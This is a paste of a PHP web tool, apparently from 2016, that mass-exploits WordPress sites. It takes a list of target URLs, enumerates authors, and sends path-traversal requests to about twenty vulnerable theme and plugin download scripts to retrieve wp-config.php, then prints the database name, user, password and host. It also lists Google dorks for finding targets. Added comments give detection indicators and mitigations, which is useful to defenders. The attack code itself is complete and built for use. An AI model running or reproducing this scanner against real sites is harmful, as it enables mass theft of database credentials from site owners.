DrsMalware

AUTO Exploit LFI WordPress 4.2.7

Feb 27th, 2016
  1. <html>
  2. <title>Auto LFI | Drs.Malware </Title>
  3. <body>
  4. <body style="background-color:#2980b9">
  5. <pre><center>
  6. <br>Auto LFI | Drs.Malware</br>
  7. <img src="https://lh3.googleusercontent.com/-8HHgMgxIgyA/VtEDio6PwaI/AAAAAAAAAF4/teVXCOj3ex0/h120/logo-pinkcube-nieuw-kubus.png" alt="CyberDB" style="width:128px;height:128px;">
  8. <br>Code By DRS.Malware </br>
  9. <br>Dont Forget Visit www.cyber-db.id </br>
  10. <form method='POST'>
  11. <textarea name='sites' cols='45' rows='15'></textarea>
  12. _______________________________________________________________
  13. </br><input type='submit' value='SANTAP NJENG!' /><br>
  14. </form>
  15.  
  16.  
  17. <?php
  18.  // Batch scanner: for each URL posted in 'sites' it fingerprints WordPress, then requests known theme/plugin file-download endpoints with path traversal aimed at wp-config.php.
  19. @set_time_limit(0); // 0 = no execution time limit; '@' hides any warning from the call
  20.  // Defender view: every request path, POST field and User-Agent string below is usable as an access-log or WAF indicator.
  21.  // The endpoints are third-party theme/plugin scripts, not WordPress core, so exposure depends on what is installed rather than on the core version named in the paste title.
  22. $sites = explode("\r\n", $_POST['sites']); // one target base URL per CRLF-separated textarea line; no validation is applied
  23.  
  24. foreach($sites as $site) {
  25.  
  26. $site = trim($site);
  27.  // Step 1: fetch the front page (response headers included) with a fixed legacy MSIE User-Agent.
  28. $ch = curl_init();
  29. curl_setopt($ch, CURLOPT_URL, "$site");
  30. curl_setopt($ch, CURLOPT_HEADER, 1);
  31. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  32. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  33. $get = curl_exec($ch);
  34. curl_close($ch);
  35. if(preg_match("#WordPress (.*?)/>#", $get, $version)){ // matches the text 'WordPress <something>/>' -- presumably the generator meta tag (TODO confirm)
  36. $str = str_replace('/>', "", $version[0]); // strip the tag terminator from the matched text
  37. $str = str_replace('"', "", $str); // strip double quotes, leaving the version string
  38.  // Step 2: author-archive enumeration. Restricting or redirecting ?author=N requests removes this user-name leak.
  39. $users = @file_get_contents("$site/?author=1");
  40. preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  41. $wpuser = explode('|',$user[1]); // text before the first '|' in the page title is reported as the user name
  42. echo " <br>_______________________________________________________________</br>";
  43. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; } // end of the fingerprint branch; the probes below run whether or not it matched, so hiding the version does not stop them
  44.  // Step 3: GET-based probes. Each $expl entry is a download-style script whose file parameter is pointed at wp-config.php, mostly through '../' traversal.
  45. # Dork Google: revslider.php "index of"
  46. # inurl:wp-content/themes/antioch
  47. # inurl:wp-content/themes/authentic
  48.  // Detection: GET requests to the paths below with 'wp-config.php' in the query string; a 200 response whose body contains DB_ defines means the file was disclosed.
  49.  // Mitigation: remove or update the listed themes/plugins and limit file parameters to an allowlist inside a fixed directory. After a hit, rotate the DB credentials and the keys/salts, because the whole file is returned to the client.
  50. $expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
  51. foreach($expl as $exploit){
  52. $ch = curl_init();
  53. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  54. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  55. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  56. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); // a different fixed legacy User-Agent from the fingerprint request
  57. $xp = curl_exec ($ch);
  58. curl_close($ch);
  59. if(preg_match("#DB_USER#i",$xp)){ // a body containing 'DB_USER' is treated as a disclosed wp-config.php
  60. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME); // pulls the single-quoted value that follows each constant name
  61. echo "DB_NAME:{$DB_NAME[1]}<br>";
  62. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  63. echo "DB_USER:{$DB_USER[1]}<br>";
  64. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  65. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  66. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  67. echo "DB_HOST:{$DB_HOST[1]}<br>";
  68.  
  69. }} // closes the DB_USER check and the $expl loop
  70.  // Step 4: POST-based probes against dl-skin.php in the listed themes. The traversal string travels in the request body, so access logs that record only the URL will not show it; alert on POSTs to these paths.
  71. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
  72. foreach($lt as $l){
  73. $site = "$site/$l"; // appends the path to $site and uses the result as the request URL
  74. $process = curl_init($site);
  75. curl_setopt($process, CURLOPT_TIMEOUT, 30); // 30-second cap per request
  76. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"); // third fixed legacy User-Agent
  77. curl_setopt($process, CURLOPT_HEADER, TRUE);
  78. curl_setopt($process, CURLOPT_POST, 1);
  79. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php"); // WAF indicator: this field name carrying '../' or 'wp-config.php'
  80. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  81. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed
  82. $return = curl_exec($process);
  83. if(preg_match("#DB_USER#i",$return)){ // same disclosure test and value extraction as the GET probes
  84. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  85. echo "DB_NAME:{$DB_NAME[1]}<br>";
  86. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  87. echo "DB_USER:{$DB_USER[1]}<br>";
  88. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  89. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  90. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  91. echo "DB_HOST:{$DB_HOST[1]}<br>";
  92. break; // leaves the $lt loop after the first response that contains DB_USER
  93. echo " <br>_______________________________________________________________</br>";
  94.  
  95. } // end of the DB_USER check
  96. } // end of the $lt loop
  97. } // end of the per-site loop
  98.  
  99. ?>
  100. </html>
  101. </body>
  102. </pre></center>